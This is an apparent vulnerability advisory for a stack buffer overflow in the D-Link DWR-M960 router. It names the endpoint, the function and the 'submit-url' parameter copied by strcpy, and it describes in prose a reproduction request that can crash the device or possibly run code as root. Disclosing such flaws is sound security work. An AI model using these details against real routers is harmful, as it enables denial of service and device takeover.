D-Link DWR-M960 Stack-Based Buffer Overflow Vulnerability in Bridge VLAN Configuration Endpoint

A stack-based buffer overflow vulnerability has been identified in the D-Link DWR-M960 router, specifically in the Bridge VLAN configuration endpoint '/boafrm/formBridgeVlan' within the 'sub_42B5A0' function. This vulnerability arises because the function improperly handles the 'submit-url' parameter by using 'strcpy' to copy its contents into a global buffer called 'wizard_htm' without checking the length of the input. As a result, an attacker can exploit this flaw by sending an oversized 'submit-url' parameter, leading to a buffer overflow condition.

Impact

Exploitation of this vulnerability causes the web server (boa) to crash or the device to reboot unexpectedly. Additionally, there is potential for arbitrary code execution by overwriting function pointers or control structures in memory, allowing an attacker to execute code with root privileges.

Reproduction

The vulnerability can be reproduced by sending a POST request to '/boafrm/formBridgeVlan' with the 'save_apply' parameter and an oversized 'submit-url' parameter. Other VLAN parameters are not strictly necessary if the request is crafted to bypass initial checks or if valid default values are assumed.